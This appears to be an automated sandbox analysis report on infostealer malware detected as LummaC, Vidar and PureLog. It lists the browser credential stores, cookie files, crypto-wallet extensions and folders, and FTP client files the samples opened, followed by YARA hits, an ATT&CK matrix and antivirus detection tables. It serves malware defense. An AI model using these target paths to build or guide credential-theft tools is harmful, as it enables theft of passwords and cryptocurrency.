Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Users\user\AppData\Local\Temp\1015079001\Bxq1jd2.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.files\key4.db
Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
Source: C:\Users\user\AppData\Local\Temp\1015079001\Bxq1jd2.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.files\journals\key4.db
Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
Source: C:\Users\user\AppData\Local\Temp\1015079001\Bxq1jd2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\AppData\Local\Temp\1015079001\Bxq1jd2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
Source: C:\Users\user\AppData\Local\Temp\1015079001\Bxq1jd2.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\datareporting\glean\db\key4.db
Source: C:\Users\user\AppData\Local\Temp\1015079001\Bxq1jd2.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\datareporting\archived\key4.db
Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
Source: C:\Users\user\AppData\Local\Temp\1015079001\Bxq1jd2.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\crashes\key4.db
Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
Source: C:\Users\user\AppData\Local\Temp\1015079001\Bxq1jd2.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\datareporting\archived\2022-01\key4.db
Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
Source: C:\Users\user\AppData\Local\Temp\1015079001\Bxq1jd2.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\key4.db
Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
Source: C:\Users\user\AppData\Local\Temp\1015079001\Bxq1jd2.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\gmp-widevinecdm\4.10.2209.1\key4.db
Source: C:\Users\user\AppData\Local\Temp\1015079001\Bxq1jd2.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\cookies.sqlite
Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
Source: C:\Users\user\AppData\Local\Temp\1015079001\Bxq1jd2.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\gmp-gmpopenh264\key4.db
Source: C:\Users\user\AppData\Local\Temp\1015079001\Bxq1jd2.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\1015079001\Bxq1jd2.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\gmp-gmpopenh264\1.8.1.1\key4.db
Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
Source: C:\Users\user\AppData\Local\Temp\1015079001\Bxq1jd2.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\crashes\events\key4.db
Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
Source: C:\Users\user\AppData\Local\Temp\1015079001\Bxq1jd2.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\datareporting\glean\key4.db
Source: C:\Users\user\AppData\Local\Temp\1015079001\Bxq1jd2.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\datareporting\key4.db
Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
Source: C:\Users\user\AppData\Local\Temp\1015079001\Bxq1jd2.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\saved-telemetry-pings\key4.db
Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
Source: C:\Users\user\AppData\Local\Temp\1015079001\Bxq1jd2.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\storage\default\key4.db
Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla
Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Preferences
Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
Source: C:\Users\user\AppData\Local\Temp\1015079001\Bxq1jd2.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\storage\permanent\chrome\idb\3561288849sdhlie.files\key4.db
Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Users\user\AppData\Local\Temp\1015079001\Bxq1jd2.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\gmp-widevinecdm\key4.db

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exe	File opened: C:\Users\user\AppData\Roaming\FTPGetter
Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exe	File opened: C:\Users\user\AppData\Roaming\FTPbox
Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exe	File opened: C:\Users\user\AppData\Roaming\FTPInfo
Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exe	File opened: C:\Users\user\AppData\Roaming\FTPRush
Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exe	File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla
Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites
Source: C:\Users\user\AppData\Local\Temp\1015079001\Bxq1jd2.exe	File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exe	File opened: C:\ProgramData\SiteDesigner\3D-FTP

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exe	File opened: C:\Users\user\AppData\Roaming\Binance
Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\1015079001\Bxq1jd2.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\
Source: C:\Users\user\AppData\Local\Temp\1015079001\Bxq1jd2.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Users\user\AppData\Local\Temp\1015079001\Bxq1jd2.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Users\user\AppData\Local\Temp\1015079001\Bxq1jd2.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
Source: C:\Users\user\AppData\Local\Temp\1015079001\Bxq1jd2.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
Source: C:\Users\user\AppData\Local\Temp\1015079001\Bxq1jd2.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\
Source: C:\Users\user\AppData\Local\Temp\1015079001\Bxq1jd2.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\AppData\Local\Temp\1015079001\Bxq1jd2.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\AppData\Local\Temp\1015079001\Bxq1jd2.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\backups\
Source: C:\Users\user\AppData\Local\Temp\1015079001\Bxq1jd2.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\
Source: C:\Users\user\AppData\Local\Temp\1015079001\Bxq1jd2.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\
Source: C:\Users\user\AppData\Local\Temp\1015079001\Bxq1jd2.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\
Source: C:\Users\user\AppData\Local\Temp\1015079001\Bxq1jd2.exe	File opened: C:\Users\user\AppData\Roaming\Binance\
Source: C:\Users\user\AppData\Local\Temp\1015079001\Bxq1jd2.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
Source: C:\Users\user\AppData\Local\Temp\1015079001\Bxq1jd2.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
Source: C:\Users\user\AppData\Local\Temp\1015079001\Bxq1jd2.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\
Source: C:\Users\user\AppData\Local\Temp\1015079001\Bxq1jd2.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\
Source: C:\Users\user\AppData\Local\Temp\1015079001\Bxq1jd2.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\
Source: C:\Users\user\AppData\Local\Temp\1015079001\Bxq1jd2.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\
Source: C:\Users\user\AppData\Local\Temp\1015079001\Bxq1jd2.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\
Source: C:\Users\user\AppData\Local\Temp\1015079001\Bxq1jd2.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\
Source: C:\Users\user\AppData\Local\Temp\1015079001\Bxq1jd2.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\

Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exe	Directory queried: C:\Users\user\Documents\GLTYDMDUST
Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exe	Directory queried: C:\Users\user\Documents\GLTYDMDUST
Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exe	Directory queried: C:\Users\user\Documents\NIRMEKAMZH
Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exe	Directory queried: C:\Users\user\Documents\NIRMEKAMZH
Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exe	Directory queried: C:\Users\user\Documents\NYMMPCEIMA
Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exe	Directory queried: C:\Users\user\Documents\NYMMPCEIMA

Source: Yara match	File source: 00000014.00000003.269581682088.00000000012DF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000003.269597691521.00000000012DF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000030.00000002.270484343016.00000000005B9000.00000040.00000001.01000000.00000016.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: b1dc05533c.exe PID: 6412, type: MEMORYSTR

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match

File source: Process Memory Space: b1dc05533c.exe PID: 6412, type: MEMORYSTR

Yara detected PureLog Stealer

Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\1015130001\EkmIhQM.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\46BKFKIN\EkmIhQM[1].exe, type: DROPPED

Yara detected Vidar stealer

Source: Yara match

File source: 00000030.00000002.270484343016.00000000005B9000.00000040.00000001.01000000.00000016.sdmp, type: MEMORY

Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B0ZBZFKQ\94CwbGg[1].exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\1015305001\94CwbGg.exe, type: DROPPED

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	1 Scripting	Valid Accounts	21 Windows Management Instrumentation	1 Scripting	1 Abuse Elevation Control Mechanism	11 Deobfuscate/Decode Files or Information	2 OS Credential Dumping	1 System Time Discovery	Remote Services	11 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	11 Native API	1 DLL Side-Loading	1 DLL Side-Loading	1 Abuse Elevation Control Mechanism	1 Credentials in Registry	14 File and Directory Discovery	Remote Desktop Protocol	41 Data from Local System	1 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 Command and Scripting Interpreter	121 Scheduled Task/Job	1 Access Token Manipulation	31 Obfuscated Files or Information	Security Account Manager	49 System Information Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	1 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	121 Scheduled Task/Job	1 Registry Run Keys / Startup Folder	312 Process Injection	431 Software Packing	NTDS	1 Query Registry	Distributed Component Object Model	Input Capture	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	1 PowerShell	Network Logon Script	121 Scheduled Task/Job	1 Timestomp	LSA Secrets	661 Security Software Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	1 Registry Run Keys / Startup Folder	1 DLL Side-Loading	Cached Domain Credentials	2 Process Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 File Deletion	DCSync	341 Virtualization/Sandbox Evasion	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	113 Masquerading	Proc Filesystem	1 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	341 Virtualization/Sandbox Evasion	/etc/passwd and /etc/shadow	1 Remote System Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	1 Access Token Manipulation	Network Sniffing	1 System Network Configuration Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement
Network Security Appliances	Domains	Compromise Software Dependencies and Development Tools	AppleScript	Launchd	Launchd	312 Process Injection	Input Capture	System Network Connections Discovery	Software Deployment Tools	Remote Data Staging	Mail Protocols	Exfiltration Over Unencrypted Non-C2 Protocol	Firmware Corruption

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label
file.exe	47%	ReversingLabs	Win32.Infostealer.Tinba
file.exe	100%	Avira	TR/Crypt.TPM.Gen
file.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\46BKFKIN\random[2].exe	100%	Avira	TR/ATRAPS.Gen
C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	100%	Avira	TR/AD.Nekark.eiqyn
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\L2D128LW\AzVRM7c[1].exe	100%	Avira	TR/AD.Nekark.eiqyn
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\7LE4YNMI\random[3].exe	100%	Avira	HEUR/AGEN.1306956
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\46BKFKIN\random[1].exe	100%	Avira	TR/Crypt.TPM.Gen
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\46BKFKIN\Bxq1jd2[1].exe	100%	Avira	HEUR/AGEN.1312567
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B0ZBZFKQ\dwVrTdy[1].exe	100%	Avira	TR/AD.Nekark.eiqyn
C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe	100%	Avira	TR/AD.Nekark.eiqyn
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\46BKFKIN\random[2].exe	100%	Avira	TR/Crypt.XPACK.Gen
C:\Users\user\AppData\Local\Temp\1011459001\0d47c4c34f.exe	100%	Avira	TR/Crypt.TPM.Gen
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\7LE4YNMI\t5abhIx[1].exe	100%	Avira	TR/AD.Nekark.eiqyn
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\46BKFKIN\H9TU4oY[1].exe	100%	Avira	TR/Crypt.XPACK.Gen
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\7LE4YNMI\ZiYbk6W[1].exe	100%	Avira	TR/Crypt.XPACK.Gen
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\46BKFKIN\random[1].exe	100%	Avira	TR/Crypt.XPACK.Gen
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\46BKFKIN\random[2].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\L2D128LW\AzVRM7c[1].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\7LE4YNMI\random[3].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\46BKFKIN\random[1].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\46BKFKIN\random[1].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\46BKFKIN\Bxq1jd2[1].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\7LE4YNMI\wOKhy9f[1].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B0ZBZFKQ\dwVrTdy[1].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B0ZBZFKQ\K6UAlAU[1].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\46BKFKIN\random[2].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\1011459001\0d47c4c34f.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\46BKFKIN\EkmIhQM[1].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\7LE4YNMI\t5abhIx[1].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\46BKFKIN\H9TU4oY[1].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\7LE4YNMI\ZiYbk6W[1].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\46BKFKIN\random[2].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\46BKFKIN\random[1].exe	100%	Joe Sandbox ML
C:\Program Files\Windows Media Player\graph\graph.exe	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\46BKFKIN\Bxq1jd2[1].exe	62%	ReversingLabs	Win32.Trojan.LummaC
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\46BKFKIN\EkmIhQM[1].exe	8%	ReversingLabs
